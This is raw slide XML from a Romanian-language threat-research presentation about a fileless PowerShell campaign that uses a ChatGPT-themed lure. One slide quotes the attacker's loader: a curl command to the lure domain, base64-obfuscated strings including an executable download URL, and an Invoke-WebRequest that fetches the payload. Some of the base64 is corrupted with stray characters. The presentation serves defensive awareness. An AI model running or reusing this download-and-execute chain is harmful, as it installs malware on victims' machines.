              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>este</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prescurtarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Invoke-Expression, care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>execută</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>textul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>primit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> ca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> cum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> fi cod PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7B77D87-0547-984F-48D3-C0C4A93671D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ce se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>întâmplă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fapt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="901086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C187B-28DF-2CFE-67CB-AA41D4356EB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A9A787F-096D-5FAF-ACE2-117996D7DF3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381740" y="1871625"/>
            <a:ext cx="9601504" cy="4688973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>curl.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -H "User-Agent: PowerShell” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://chatgpt.keytool.cc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$downloadUrlB64 = "aHR0cHM6Ly9yZWpvc2VsdWx1YXIuY29tL2ZpbGVzL1BST0LTQWMuZXhl"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$updaterExeB64 = "d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Cyrl-AZ" dirty="0"/>
              <a:t>Х</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BkYXRLci5leGU="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$hiddenAttrB64 = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SGlkZGVu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$silentlyContinueB64 = "U2lsZW50bHLjb250aW51ZQ=="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$stopActionB64 = "U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Cyrl-AZ" dirty="0"/>
              <a:t>З</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RvCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$directoryB64 = "RGlyZWN0b3J5"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$runAsB64 = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UnVuQX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>™="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>downloadUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Encoding]::UTF8.GetString([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]: :FromBase64String($downloadUrlB64))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -Uri $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>downloadUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OutFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tempPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UseBasicParsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ErrorAction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5259D87A-C4A2-3292-5DB4-E1EDE868AFD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ce se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>întâmplă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fapt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (II)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27945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ambar 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AE9A6EB-A11B-38E0-EC38-9B8EA80C3D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="9032" b="9032"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182711" y="2067255"/>
            <a:ext cx="1983822" cy="1960694"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;120;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25BA030-3C8D-42EB-FCBF-BA999E1C05A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182711" y="4304585"/>
            <a:ext cx="2164442" cy="1001867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="id-ID"/>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114999"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Bogdan BOTEZATU</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Director de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cercetare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amenințări</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>informatice</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lora"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C8E682-0687-4270-06CF-223786D619FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Intro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3403436-9C6B-3B86-0ABB-DEF75E591D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560965" y="0"/>
            <a:ext cx="164617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7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1E4FD3-E280-B9B7-557E-B7406C1483DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638676" y="720725"/>
            <a:ext cx="5484421" cy="568960"/>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3600" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="006EFF"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Despre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="006EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{899ADF42-E1F4-64F7-ACF4-A8118552A883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11123526" y="70338"/>
            <a:ext cx="1048378" cy="160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 name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0A91D57-35D1-3696-2D7B-968869BE5744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11123097" y="6400800"/>
            <a:ext cx="52762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 name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3CE0C69-CA18-D38C-2DC2-6E6D8DFA7795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638676" y="1683462"/>
            <a:ext cx="5663461" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="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1pPr>
            <a:lvl2pPr marL="274320" indent="-182880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="006EFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:buChar char="↳"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="548640" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="006EFF"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="731520" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="006EFF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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20 de ani de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>experiență</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>securitate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cibernetică</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18+ ani la Bitdefender, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>actualmente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> director de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cercetare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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err="1"/>
              <a:t>Cunoscut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ajutorul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victimelor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ransomware</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err="1"/>
              <a:t>Coordonator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>programului</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cercetare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnerabilităților</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pe care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>îl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>desfășurăm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cu MITRE / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2933064462"/>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6279F-198B-1A0A-3EDF-E1716543CF5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3AB4588-1951-A00A-49F7-9CD74E0004B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="7309381" cy="4688973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Fără fișiere malware de scanat: Soluțiile tradiționale se bazează pe identificarea fișierelor malițioase salvate pe disc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> încarcă </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>un task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>malițios direct în RAM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
